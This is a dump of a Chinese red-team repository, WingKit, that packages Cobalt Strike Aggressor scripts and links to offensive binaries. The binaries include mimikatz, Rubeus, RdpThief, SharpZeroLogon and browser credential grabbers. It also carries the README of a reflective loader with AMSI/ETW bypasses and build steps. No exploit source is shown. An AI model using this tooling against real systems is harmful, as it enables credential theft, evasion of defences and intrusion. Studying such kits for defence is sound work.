├── .gitignore ├── README.md ├── Wing.cna ├── bof ├── README.md ├── zerologon.x64.o └── zerologon.x86.o ├── dll ├── .DS_Store ├── hashdump.x64.dll ├── mimikatz.dll └── powerkatz_x64.dll ├── exe ├── CertKatz.exe ├── CleanRunMRU.exe ├── CloneVault.exe ├── CredPhisher.exe ├── DecryptAutoLogon.exe ├── InternalMonologue.exe ├── Net-GPPPassword.exe ├── PowerView.ps1 ├── README.md ├── RdpThief.dll ├── RdpThief_x64.tmp ├── Recon-AD-AllLocalGroups.dll ├── Recon-AD-Computers.dll ├── Recon-AD-Domain.dll ├── Recon-AD-Groups.dll ├── Recon-AD-LocalGroups.dll ├── Recon-AD-SPNs.dll ├── Recon-AD-Users.dll ├── Rubeus.exe ├── SafetyKatz.exe ├── SearchSessions.exe ├── Seatbelt.exe ├── SharpCOM.exe ├── SharpChromium.exe ├── SharpClipboard.exe ├── SharpHound.exe ├── SharpHound.ps1 ├── SharpKatz.exe ├── SharpMapExec.exe ├── SharpRelay.exe ├── SharpSQLTools.exe ├── SharpSecDump.exe ├── SharpSniper.exe ├── SharpStay.exe ├── SharpUp.exe ├── SharpView.exe ├── SharpWMI.exe ├── SharpWeb.exe ├── SharpWifiGrabber.exe ├── SharpZeroLogon.exe ├── SpoolSample.exe ├── SpoolTrigger.x64.dll ├── SpoolTrigger.x86.dll ├── StandIn.exe ├── Tokenvator.exe ├── Watson.exe ├── WinDivert64.sys ├── dazzleUP_Reflective_DLL.dll ├── locksreen.exe ├── pickl3_reflective_dll_x64.dll └── reflective_dll.dll ├── github ├── CobaltStrikeReflectiveLoader │ ├── README.md │ ├── ReflectiveLoader.c │ ├── bin │ │ └── ReflectiveLoader.x64.o │ ├── compile-x64.sh │ ├── images │ │ ├── CreateBeaconStageless.png │ │ ├── beaconCreateSuccess.png │ │ ├── bobsBeacon.png │ │ ├── loadRdllScriptMenu.png │ │ └── top.png │ ├── rdll_loader.cna │ └── versions │ │ ├── ReflectiveLoader-v0_1.c │ │ ├── ReflectiveLoader-v0_2.c │ │ ├── ReflectiveLoader-v0_3.c │ │ ├── ReflectiveLoader-v0_3_1.c │ │ ├── ReflectiveLoader-v0_4.c │ │ └── ReflectiveLoader-v0_5.c ├── WdToggle │ ├── Makefile │ ├── README.md │ ├── Syscalls.h │ ├── WdToggle.c │ ├── WdToggle.h │ ├── WdToggle.o │ ├── WdToggle.png │ └── beacon.h └── ZeroLogon-BOF │ ├── LICENSE │ ├── dist │ ├── 
zerologon.cna │ ├── zerologon.x64.o │ └── zerologon.x86.o │ ├── make.bat │ └── src │ ├── beacon.h │ └── zerologon.c └── scripts ├── DefenderAV.cna ├── Initial_Access.cna ├── Lateral-Movement.cna ├── PasswordDump.cna ├── Persistence.cna ├── Privilege.cna ├── README.md ├── bof └── zerologon.cna ├── cmd ├── AV.cna ├── FilesColor.cna ├── Highlight_Beacons.cna ├── ProcessColor.cna ├── RdpThief.cna ├── Recon-AD.cna ├── SharpZeroLogon_alias.cna ├── Spool.cna ├── SpoolSample.cna ├── clipboard_monitor.cna ├── coffee.cna ├── cwd-in-beacon-status-bar.cna ├── dazzleUP.cna ├── dingding.cna ├── frp.cna ├── internal-monologue_alias.cna ├── leave_no_trace.cna ├── rubeus_alias.cna ├── safetykatz_alias.cna ├── sessionsearcher_alias.cna ├── sharpcom_alias.cna ├── sharpmapexec_alias.cna ├── sharprelay_alias.cna ├── sharpsniper_alias.cna ├── sharpsqltools_alias.cna ├── sharpup_alias.cna ├── sharpview_alias.cna ├── standin_alias.cna ├── test.cna ├── upload.cna └── watson_alias.cna └── demo.cna /.gitignore: -------------------------------------------------------------------------------- 1 | exe/Xshell.exe 2 | dll/clearpass.x64.dll 3 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | ## 前言 2 | 3 | 4 | > 现在很少用CS了,就把之前自己日常整理用的Kit分享一下。 5 | 6 | ## WingKit 7 | ### 信息收集 8 | ![image.png](https://cdn.nlark.com/yuque/0/2021/png/370919/1635049440891-d4b74954-6c73-424a-9e7e-380cd7f721fc.png#clientId=u2f88f3e2-eadd-4&from=paste&height=607&id=uc7ab3642&margin=%5Bobject%20Object%5D&name=image.png&originHeight=1214&originWidth=2046&originalType=binary&ratio=1&size=206387&status=done&style=none&taskId=u90c29727-715f-4f27-b7d6-6e2410043cc&width=1023) 9 | 
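![image.png](https://cdn.nlark.com/yuque/0/2021/png/370919/1635049544523-10a1331f-9441-4ea9-ad20-29c55135cd12.png#clientId=u2f88f3e2-eadd-4&from=paste&height=608&id=u6cd33c63&margin=%5Bobject%20Object%5D&name=image.png&originHeight=1216&originWidth=1830&originalType=binary&ratio=1&size=143619&status=done&style=none&taskId=u977aa81b-2eac-4d5a-b68e-62e11520502&width=915) 10 | ## 权限维持 11 | ![image.png](https://cdn.nlark.com/yuque/0/2021/png/370919/1635049570968-0335803f-3dd2-4db6-88ec-cfbe3279b26a.png#clientId=u2f88f3e2-eadd-4&from=paste&height=637&id=u6cb6d327&margin=%5Bobject%20Object%5D&name=image.png&originHeight=1274&originWidth=1894&originalType=binary&ratio=1&size=168907&status=done&style=none&taskId=u76119c68-85b5-4100-a615-f537ed504ce&width=947) 12 | ## Cred Access 13 | ![image.png](https://cdn.nlark.com/yuque/0/2021/png/370919/1635049604119-01025926-7870-4701-a997-cfcfd0323db7.png#clientId=u2f88f3e2-eadd-4&from=paste&height=625&id=uf207e1ce&margin=%5Bobject%20Object%5D&name=image.png&originHeight=1250&originWidth=1742&originalType=binary&ratio=1&size=197655&status=done&style=none&taskId=uab876b12-d710-48bb-81b4-5303b377836&width=871) 14 | 15 | 16 | ## 参考 17 | [https://github.com/josephkingstone/cobalt_strike_extension_kit/tree/3.0](https://github.com/josephkingstone/cobalt_strike_extension_kit/tree/3.0) 18 | ​ 19 | 20 | -------------------------------------------------------------------------------- /Wing.cna: --------------------------------------------------------------------------------
##################################
#                                #
#            WingKit             #
#                                #
##################################

# Root of the toolkit checkout: the parent directory of the WingKit folder,
# with a trailing slash, which is the shape the original value had. It is now
# derived from this script's own location via script_resource() instead of the
# author's hard-coded absolute home path, so the kit loads from wherever it is
# checked out. Kept as a global in case a command script still references it.
@rootpath = getFileParent(getFileParent(script_resource("Wing.cna"))) . "/";

# Directory holding the per-command alias scripts (scripts/cmd), resolved
# relative to this script rather than through @rootpath.
@cmdpath = script_resource("scripts/cmd");
println(@cmdpath);

# include() executes each file it is given as part of this client's script,
# so only files that are actually Aggressor scripts (*.cna) are loaded. Anything
# else that ends up in the directory (README.md, .DS_Store, stray uploads) is
# skipped instead of producing a parse error at startup. Review the contents of
# scripts/cmd before loading: every matching file is run unconditionally.
@aggressor = ls(@cmdpath);
println("[+] 正在导入命令行插件:");
foreach $file (@aggressor) {
    if ("*.cna" iswm $file) {
        include($file);
        println("$file");
    }
}

# 导入github的一些插件 (load some plugins from the github/ directory)
# NOTE(review): github/CSSG is not present in this tree, so this include stays
# disabled until that project is vendored in.
# include(script_resource("github/CSSG/CSSG_load.cna"));

# 主菜单 (main menu): each submenu is populated by its own script under scripts/.
popup beacon_top {
    menu "WingKit" {
        menu "Initial Access" {
            include(script_resource("scripts/Initial_Access.cna"));
        }
        menu "DefenderAV" {
            include(script_resource("scripts/DefenderAV.cna"));
        }
        menu "权限维持" {
            include(script_resource("scripts/Persistence.cna"));
        }
        menu "密码一把梭" {
            include(script_resource("scripts/PasswordDump.cna"));
        }
        menu "权限提升" {
            include(script_resource("scripts/Privilege.cna"));
        }
        menu "横向移动" {
            include(script_resource("scripts/Lateral-Movement.cna"));
        }
    }
}
-------------------------------------------------------------------------------- /bof/README.md: -------------------------------------------------------------------------------- 1 | ## README 2 | 这个目录存放所有的bof -------------------------------------------------------------------------------- /bof/zerologon.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XTeam-Wing/WingKit/e69e554b6e04b80bb57dd882be1622432f1fd057/bof/zerologon.x64.o -------------------------------------------------------------------------------- /bof/zerologon.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XTeam-Wing/WingKit/e69e554b6e04b80bb57dd882be1622432f1fd057/bof/zerologon.x86.o -------------------------------------------------------------------------------- /dll/.DS_Store: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XTeam-Wing/WingKit/e69e554b6e04b80bb57dd882be1622432f1fd057/dll/.DS_Store -------------------------------------------------------------------------------- /dll/hashdump.x64.dll: --------------------------------------------------------------------------------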
https://raw.githubusercontent.com/XTeam-Wing/WingKit/e69e554b6e04b80bb57dd882be1622432f1fd057/dll/hashdump.x64.dll -------------------------------------------------------------------------------- /dll/mimikatz.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XTeam-Wing/WingKit/e69e554b6e04b80bb57dd882be1622432f1fd057/dll/mimikatz.dll -------------------------------------------------------------------------------- /dll/powerkatz_x64.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XTeam-Wing/WingKit/e69e554b6e04b80bb57dd882be1622432f1fd057/dll/powerkatz_x64.dll -------------------------------------------------------------------------------- /exe/CertKatz.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XTeam-Wing/WingKit/e69e554b6e04b80bb57dd882be1622432f1fd057/exe/CertKatz.exe -------------------------------------------------------------------------------- /exe/CleanRunMRU.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XTeam-Wing/WingKit/e69e554b6e04b80bb57dd882be1622432f1fd057/exe/CleanRunMRU.exe -------------------------------------------------------------------------------- /exe/CloneVault.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XTeam-Wing/WingKit/e69e554b6e04b80bb57dd882be1622432f1fd057/exe/CloneVault.exe -------------------------------------------------------------------------------- /exe/CredPhisher.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XTeam-Wing/WingKit/e69e554b6e04b80bb57dd882be1622432f1fd057/exe/CredPhisher.exe -------------------------------------------------------------------------------- 
/exe/DecryptAutoLogon.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XTeam-Wing/WingKit/e69e554b6e04b80bb57dd882be1622432f1fd057/exe/DecryptAutoLogon.exe -------------------------------------------------------------------------------- /exe/InternalMonologue.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XTeam-Wing/WingKit/e69e554b6e04b80bb57dd882be1622432f1fd057/exe/InternalMonologue.exe -------------------------------------------------------------------------------- /exe/Net-GPPPassword.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XTeam-Wing/WingKit/e69e554b6e04b80bb57dd882be1622432f1fd057/exe/Net-GPPPassword.exe -------------------------------------------------------------------------------- /exe/README.md: -------------------------------------------------------------------------------- 1 | ## Tool List 2 | 这个目录存放所有exe 3 | 4 | - Seatbelt 5 | 信息收集 -------------------------------------------------------------------------------- /exe/RdpThief.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XTeam-Wing/WingKit/e69e554b6e04b80bb57dd882be1622432f1fd057/exe/RdpThief.dll -------------------------------------------------------------------------------- /exe/RdpThief_x64.tmp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XTeam-Wing/WingKit/e69e554b6e04b80bb57dd882be1622432f1fd057/exe/RdpThief_x64.tmp -------------------------------------------------------------------------------- /exe/Recon-AD-AllLocalGroups.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XTeam-Wing/WingKit/e69e554b6e04b80bb57dd882be1622432f1fd057/exe/Recon-AD-AllLocalGroups.dll 
-------------------------------------------------------------------------------- /exe/Recon-AD-Computers.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XTeam-Wing/WingKit/e69e554b6e04b80bb57dd882be1622432f1fd057/exe/Recon-AD-Computers.dll -------------------------------------------------------------------------------- /exe/Recon-AD-Domain.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XTeam-Wing/WingKit/e69e554b6e04b80bb57dd882be1622432f1fd057/exe/Recon-AD-Domain.dll -------------------------------------------------------------------------------- /exe/Recon-AD-Groups.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XTeam-Wing/WingKit/e69e554b6e04b80bb57dd882be1622432f1fd057/exe/Recon-AD-Groups.dll -------------------------------------------------------------------------------- /exe/Recon-AD-LocalGroups.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XTeam-Wing/WingKit/e69e554b6e04b80bb57dd882be1622432f1fd057/exe/Recon-AD-LocalGroups.dll -------------------------------------------------------------------------------- /exe/Recon-AD-SPNs.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XTeam-Wing/WingKit/e69e554b6e04b80bb57dd882be1622432f1fd057/exe/Recon-AD-SPNs.dll -------------------------------------------------------------------------------- /exe/Recon-AD-Users.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XTeam-Wing/WingKit/e69e554b6e04b80bb57dd882be1622432f1fd057/exe/Recon-AD-Users.dll -------------------------------------------------------------------------------- /exe/Rubeus.exe: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/XTeam-Wing/WingKit/e69e554b6e04b80bb57dd882be1622432f1fd057/exe/Rubeus.exe -------------------------------------------------------------------------------- /exe/SafetyKatz.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XTeam-Wing/WingKit/e69e554b6e04b80bb57dd882be1622432f1fd057/exe/SafetyKatz.exe -------------------------------------------------------------------------------- /exe/SearchSessions.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XTeam-Wing/WingKit/e69e554b6e04b80bb57dd882be1622432f1fd057/exe/SearchSessions.exe -------------------------------------------------------------------------------- /exe/Seatbelt.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XTeam-Wing/WingKit/e69e554b6e04b80bb57dd882be1622432f1fd057/exe/Seatbelt.exe -------------------------------------------------------------------------------- /exe/SharpCOM.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XTeam-Wing/WingKit/e69e554b6e04b80bb57dd882be1622432f1fd057/exe/SharpCOM.exe -------------------------------------------------------------------------------- /exe/SharpChromium.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XTeam-Wing/WingKit/e69e554b6e04b80bb57dd882be1622432f1fd057/exe/SharpChromium.exe -------------------------------------------------------------------------------- /exe/SharpClipboard.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XTeam-Wing/WingKit/e69e554b6e04b80bb57dd882be1622432f1fd057/exe/SharpClipboard.exe 
-------------------------------------------------------------------------------- /exe/SharpHound.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XTeam-Wing/WingKit/e69e554b6e04b80bb57dd882be1622432f1fd057/exe/SharpHound.exe -------------------------------------------------------------------------------- /exe/SharpKatz.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XTeam-Wing/WingKit/e69e554b6e04b80bb57dd882be1622432f1fd057/exe/SharpKatz.exe -------------------------------------------------------------------------------- /exe/SharpMapExec.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XTeam-Wing/WingKit/e69e554b6e04b80bb57dd882be1622432f1fd057/exe/SharpMapExec.exe -------------------------------------------------------------------------------- /exe/SharpRelay.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XTeam-Wing/WingKit/e69e554b6e04b80bb57dd882be1622432f1fd057/exe/SharpRelay.exe -------------------------------------------------------------------------------- /exe/SharpSQLTools.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XTeam-Wing/WingKit/e69e554b6e04b80bb57dd882be1622432f1fd057/exe/SharpSQLTools.exe -------------------------------------------------------------------------------- /exe/SharpSecDump.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XTeam-Wing/WingKit/e69e554b6e04b80bb57dd882be1622432f1fd057/exe/SharpSecDump.exe -------------------------------------------------------------------------------- /exe/SharpSniper.exe: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/XTeam-Wing/WingKit/e69e554b6e04b80bb57dd882be1622432f1fd057/exe/SharpSniper.exe -------------------------------------------------------------------------------- /exe/SharpStay.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XTeam-Wing/WingKit/e69e554b6e04b80bb57dd882be1622432f1fd057/exe/SharpStay.exe -------------------------------------------------------------------------------- /exe/SharpUp.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XTeam-Wing/WingKit/e69e554b6e04b80bb57dd882be1622432f1fd057/exe/SharpUp.exe -------------------------------------------------------------------------------- /exe/SharpView.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XTeam-Wing/WingKit/e69e554b6e04b80bb57dd882be1622432f1fd057/exe/SharpView.exe -------------------------------------------------------------------------------- /exe/SharpWMI.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XTeam-Wing/WingKit/e69e554b6e04b80bb57dd882be1622432f1fd057/exe/SharpWMI.exe -------------------------------------------------------------------------------- /exe/SharpWeb.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XTeam-Wing/WingKit/e69e554b6e04b80bb57dd882be1622432f1fd057/exe/SharpWeb.exe -------------------------------------------------------------------------------- /exe/SharpWifiGrabber.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XTeam-Wing/WingKit/e69e554b6e04b80bb57dd882be1622432f1fd057/exe/SharpWifiGrabber.exe -------------------------------------------------------------------------------- /exe/SharpZeroLogon.exe: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/XTeam-Wing/WingKit/e69e554b6e04b80bb57dd882be1622432f1fd057/exe/SharpZeroLogon.exe -------------------------------------------------------------------------------- /exe/SpoolSample.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XTeam-Wing/WingKit/e69e554b6e04b80bb57dd882be1622432f1fd057/exe/SpoolSample.exe -------------------------------------------------------------------------------- /exe/SpoolTrigger.x64.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XTeam-Wing/WingKit/e69e554b6e04b80bb57dd882be1622432f1fd057/exe/SpoolTrigger.x64.dll -------------------------------------------------------------------------------- /exe/SpoolTrigger.x86.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XTeam-Wing/WingKit/e69e554b6e04b80bb57dd882be1622432f1fd057/exe/SpoolTrigger.x86.dll -------------------------------------------------------------------------------- /exe/StandIn.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XTeam-Wing/WingKit/e69e554b6e04b80bb57dd882be1622432f1fd057/exe/StandIn.exe -------------------------------------------------------------------------------- /exe/Tokenvator.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XTeam-Wing/WingKit/e69e554b6e04b80bb57dd882be1622432f1fd057/exe/Tokenvator.exe -------------------------------------------------------------------------------- /exe/Watson.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XTeam-Wing/WingKit/e69e554b6e04b80bb57dd882be1622432f1fd057/exe/Watson.exe 
-------------------------------------------------------------------------------- /exe/WinDivert64.sys: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XTeam-Wing/WingKit/e69e554b6e04b80bb57dd882be1622432f1fd057/exe/WinDivert64.sys -------------------------------------------------------------------------------- /exe/dazzleUP_Reflective_DLL.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XTeam-Wing/WingKit/e69e554b6e04b80bb57dd882be1622432f1fd057/exe/dazzleUP_Reflective_DLL.dll -------------------------------------------------------------------------------- /exe/locksreen.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XTeam-Wing/WingKit/e69e554b6e04b80bb57dd882be1622432f1fd057/exe/locksreen.exe -------------------------------------------------------------------------------- /exe/pickl3_reflective_dll_x64.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XTeam-Wing/WingKit/e69e554b6e04b80bb57dd882be1622432f1fd057/exe/pickl3_reflective_dll_x64.dll -------------------------------------------------------------------------------- /exe/reflective_dll.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XTeam-Wing/WingKit/e69e554b6e04b80bb57dd882be1622432f1fd057/exe/reflective_dll.dll -------------------------------------------------------------------------------- /github/CobaltStrikeReflectiveLoader/README.md: -------------------------------------------------------------------------------- 1 | # Cobalt Strike User-Defined Reflective Loader 2 | Cobalt Strike User-Defined Reflective Loader written in Assembly & C for advanced evasion capabilities. 
3 | 4 | ![](/images/top.png) 5 | 6 | + Based on Stephen Fewer's incredible Reflective Loader project: 7 | + https://github.com/stephenfewer/ReflectiveDLLInjection 8 | + Created while working through Reenz0h's Reflective DLL videos from the [Sektor7 Malware Developer Intermediate (MDI) Course](https://institute.sektor7.net/courses/rto-maldev-intermediate/) 9 | 10 | ## Versions 11 | + Different versions of this User-Defined Reflective Loader project can be found in the versions folder 12 | 13 | 14 | | Version | File | Description | 15 | |:-------:|:-----|:------------| 16 | |0.5|ReflectiveLoader-v0_5.c| Added HellsGate & HalosGate direct syscaller, replaced a lot of ASM stubs, code refactor, and ~500 bytes smaller. Credit to @SEKTOR7net the jedi HalosGate creator & @smelly__vx & @am0nsec Creators/Publishers of the Hells Gate technique! Credit to @ilove2pwn_ for recommending removing ASM Stubs! Haven't got all of them, but will keep working at it :) | 17 | |0.4|ReflectiveLoader-v0_4.c| AMSI & ETW bypasses baked into reflective loader. Can disable by commenting #define BYPASS line when compiling. Credit to @mariuszbit for the awesome idea. Credit to @\_xpn\_ + @offsectraining + @ajpc500 for their research and code | 18 | |0.3.1|ReflectiveLoader-v0_3_1.c| Changed strings from wchar to char and unpack them to unicode with MMX registers. Fixes Linux compilation error discovered by @mariuszbit | 19 | |0.3|ReflectiveLoader-v0_3.c| String obfuscation using new technique. | 20 | |0.2|ReflectiveLoader-v0_2.c| Checks the Loader to see if dependent DLLs already exist to limit times LoadLibrary() is called, custom GetSymbolAddress function to reduce calls to GetProcAddress(), and code refactor. | 21 | |0.1|ReflectiveLoader-v0_1.c| This is the original reflective loader created for this project. It includes the notes within the C file. This initial version was created with research and learning in mind. 
Few obfuscation and evasion techniques are used in this version.| 22 | 23 | ## Initial Project Goals 24 | + Learn how Reflective Loader works. 25 | + Write a Reflective Loader in Assembly. 26 | + Compatible with Cobalt Strike. 27 | + Cross-compile from macOS/Linux. 28 | + Implement Inline-Assembly into a C project. 29 | 30 | ## Future Project Goals 31 | + Use the initial project as a template for more advanced evasion techniques leveraging the flexibility of Assembly. 32 | + Implement Cobalt Strike options such as no RWX, stompPE, module stomping, changing the MZ header, etc. 33 | + Write a decent Aggressor script. 34 | + Support x86. 35 | + Have different versions of reflective loader to choose from. 36 | + Implement HellsGate/HalosGate for the initial calls that reflective loader uses (pNtFlushInstructionCache, VirtualAlloc, GetProcAddress, LoadLibraryA, etc). 37 | + Optimize the assembly code. 38 | + Hash/obfuscate strings. 39 | + Some kind of template language overlay that can modify/randomize the registers/methods. 40 | 41 | ## Usage 42 | 1. 
Start your Cobalt Strike Team Server with or without a profile 43 | + At the moment I've only tested without a profile and with a few profiles generated from [Tylous's epic SourcePoint project](https://github.com/Tylous/SourcePoint) 44 | ```bash 45 | #### This profile stuff below is optional, but this is the profile I tested this Reflective Loader with #### 46 | # Install Go on Kali if you need it 47 | sudo apt install golang-go -y 48 | # Creating a Team Server Cobalt Strike profile with SourcePoint 49 | ## Clone the SourcePoint project 50 | git clone https://github.com/Tylous/SourcePoint.git 51 | ## Build SourcePoint Go project 52 | cd SourcePoint 53 | go build SourcePoint.go 54 | ## Run it with some cool flags (look at the help menu for more info) 55 | ### This is the settings I have tested UD Reflective Loader with 56 | ./SourcePoint -PE_Clone 18 -PostEX_Name 13 -Sleep 3 -Profile 4 -Outfile myprofile.profile -Host -Injector NtMapViewOfSection 57 | ## Start Team Server 58 | cd ../ 59 | sudo ./teamserver 'T3@Ms3Rv3Rp@$$w0RD' SourcePoint/myprofile.profile 60 | ``` 61 | 2. Go to your Cobalt Strike GUI and import the rdll_loader.cna Agressor script. 62 | ![](/images/loadRdllScriptMenu.png) 63 | 3. Generate your x64 payload (Attacks -> Packages -> Windows Executable (S)) 64 | + Does not support x86 option. The x86 bin is the original Reflective Loader object file. 65 | ![](/images/CreateBeaconStageless.png) 66 | 4. Use the Script Console to make sure that the beacon created successfully with this User-Defined Reflective Loader 67 | + If successful, the output in the Script Console will look like this: 68 | ![](/images/beaconCreateSuccess.png) 69 | 70 | ## Build (Only tested from macOS at the moment) 71 | 1. 
Run the compile-x64.sh shell script after installling required dependencies 72 | ```bash 73 | # Install brew on macOS if you need it (https://brew.sh/) 74 | /bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)" 75 | # Install Ming using Brew 76 | brew install mingw-w64 77 | # Clone this Reflective DLL project from this github repo 78 | git clone https://github.com/boku7/CobaltStrikeReflectiveLoader.git 79 | # Compile the ReflectiveLoader Object file 80 | cd CobaltStrikeReflectiveLoader/ 81 | cat compile-x64.sh 82 | x86_64-w64-mingw32-gcc -c ReflectiveLoader.c -o ./bin/ReflectiveLoader.x64.o -shared -masm=intel 83 | bash compile-x64.sh 84 | ``` 85 | 2. Follow "Usage" instructions 86 | 87 | ## Credits / References 88 | ### Reflective Loader 89 | + https://github.com/stephenfewer/ReflectiveDLLInjection 90 | + 100% recommend these videos if you're interested in Reflective DLL: 91 | + [Dancing with Import Address Table (IAT) - Sektor 7 MDI Course](https://institute.sektor7.net/courses/rto-maldev-intermediate/463262-pe-madness/1435207-dancing-with-iat) 92 | + [Walking through Export Address Table - Sektor 7 MDI Course](https://institute.sektor7.net/courses/rto-maldev-intermediate/463262-pe-madness/1435189-walking-through-export-address-table) 93 | + [Reflective Injection Explained - Sektor 7 MDI Course](https://institute.sektor7.net/courses/rto-maldev-intermediate/463258-reflective-dlls/1435355-reflective-injection-explained) 94 | + [ReflectiveLoader source review - Sektor 7 MDI Course](https://institute.sektor7.net/courses/rto-maldev-intermediate/463258-reflective-dlls/1435383-reflectiveloader-source-review) 95 | ### HalosGate SysCaller 96 | + Reenz0h from @SEKTOR7net 97 | + Most of the C techniques I use are from Reenz0h's awesome courses and blogs 98 | + Best classes for malware development out there. 99 | + Creator of the halos gate technique. His work was the motivation for this work. 
100 | + [Sektor7 HalosGate Blog](https://blog.sektor7.net/#!res/2021/halosgate.md) 101 | ### HellsGate Syscaller 102 | + @smelly__vx & @am0nsec ( Creators/Publishers of the Hells Gate technique ) 103 | + Could not have made my implementation of HellsGate without them :) 104 | + Awesome work on this method, really enjoyed working through it myself. Thank you! 105 | + https://github.com/am0nsec/HellsGate 106 | + Link to the [Hell's Gate paper: https://vxug.fakedoma.in/papers/VXUG/Exclusive/HellsGate.pdf](https://vxug.fakedoma.in/papers/VXUG/Exclusive/HellsGate.pdf) 107 | ### Cobalt Strike User Defined Reflective Loader 108 | + https://www.cobaltstrike.com/help-user-defined-reflective-loader 109 | ### Great Resource for learning Intel ASM 110 | + [Pentester Academy - SLAE64](https://www.pentesteracademy.com/course?id=7) 111 | ### ETW and AMSI Bypass 112 | + @mariuszbit - for awesome idea to implement bypasses in reflective loader! 113 | + [@_XPN_ Hiding Your .NET – ETW](https://www.mdsec.co.uk/2020/03/hiding-your-net-etw/) 114 | + [ajpc500/BOFs](https://github.com/ajpc500/BOFs/) 115 | + [Offensive Security OSEP](https://www.offensive-security.com/pen300-osep/) 116 | ### Implementing ASM in C Code with GCC 117 | + https://outflank.nl/blog/2020/12/26/direct-syscalls-in-beacon-object-files/ 118 | + https://www.cs.uaf.edu/2011/fall/cs301/lecture/10_12_asm_c.html 119 | + http://gcc.gnu.org/onlinedocs/gcc-4.0.2/gcc/Extended-Asm.html#Extended-Asm 120 | ### Cobalt Strike C2 Profile Generator 121 | + [Tylous's epic SourcePoint project](https://github.com/Tylous/SourcePoint) 122 | -------------------------------------------------------------------------------- /github/CobaltStrikeReflectiveLoader/bin/ReflectiveLoader.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XTeam-Wing/WingKit/e69e554b6e04b80bb57dd882be1622432f1fd057/github/CobaltStrikeReflectiveLoader/bin/ReflectiveLoader.x64.o 
-------------------------------------------------------------------------------- /github/CobaltStrikeReflectiveLoader/compile-x64.sh: -------------------------------------------------------------------------------- 1 | x86_64-w64-mingw32-gcc -c ReflectiveLoader.c -o ./bin/ReflectiveLoader.x64.o -shared -masm=intel 2 | -------------------------------------------------------------------------------- /github/CobaltStrikeReflectiveLoader/images/CreateBeaconStageless.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XTeam-Wing/WingKit/e69e554b6e04b80bb57dd882be1622432f1fd057/github/CobaltStrikeReflectiveLoader/images/CreateBeaconStageless.png -------------------------------------------------------------------------------- /github/CobaltStrikeReflectiveLoader/images/beaconCreateSuccess.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XTeam-Wing/WingKit/e69e554b6e04b80bb57dd882be1622432f1fd057/github/CobaltStrikeReflectiveLoader/images/beaconCreateSuccess.png -------------------------------------------------------------------------------- /github/CobaltStrikeReflectiveLoader/images/bobsBeacon.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XTeam-Wing/WingKit/e69e554b6e04b80bb57dd882be1622432f1fd057/github/CobaltStrikeReflectiveLoader/images/bobsBeacon.png -------------------------------------------------------------------------------- /github/CobaltStrikeReflectiveLoader/images/loadRdllScriptMenu.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XTeam-Wing/WingKit/e69e554b6e04b80bb57dd882be1622432f1fd057/github/CobaltStrikeReflectiveLoader/images/loadRdllScriptMenu.png -------------------------------------------------------------------------------- 
